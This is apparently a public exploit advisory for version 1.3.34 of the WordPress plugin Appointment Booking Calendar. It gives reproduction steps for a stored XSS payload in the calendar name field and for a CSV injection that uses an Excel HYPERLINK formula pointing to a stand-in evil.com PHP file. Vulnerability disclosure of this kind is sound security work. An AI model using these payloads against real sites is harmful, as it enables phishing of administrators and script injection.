Share
# Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection  
# Google Dork: N/A  
# Date: 2020-03-05  
# Exploit Author: Daniel Monzón (stark0de)  
# Vendor Homepage: https://www.codepeople.net/  
# Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip  
# Version: 1.3.34  
# Tested on: Windows 7 x86 SP1  
# CVE : CVE-2020-9371, CVE-2020-9372  
  
----Stored Cross-Site-Scripting-------------------  
  
1) In http://127.0.0.1/wordpress/wp-admin/admin.php?page=cpabc_appointments.php  
2) Calendar Name=<script>alert(0)</script> and Update  
3) Click in any of the other tabs  
  
----CSV injection---------------------------------  
  
1) First we create a new calendar (Pages, add new, booking calendar) and Publish it (we can now log out)   
2) Then we go to the page and introduce data, and the payload:  
  
New booking:  
  
Name: IMPORTANT DATA  
Description: http://evil.com/evil.php  
  
New booking:  
  
Name: test  
Description: =HYPERLINK(K2;H2)   
  
This is the way it would work if i had a business registered and the payment was completed it can also be done by adding the new bookings with the same data from the admin panel  
  
3) Then we go to Bookings List and export the CSV file  
4) After that we open the file, and import data from an external file, using comma as separator  
5) Hyperlink to malicious PHP file is inserted and the user clicks on it, user is redirected to a fake login page (for example)  
  
Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016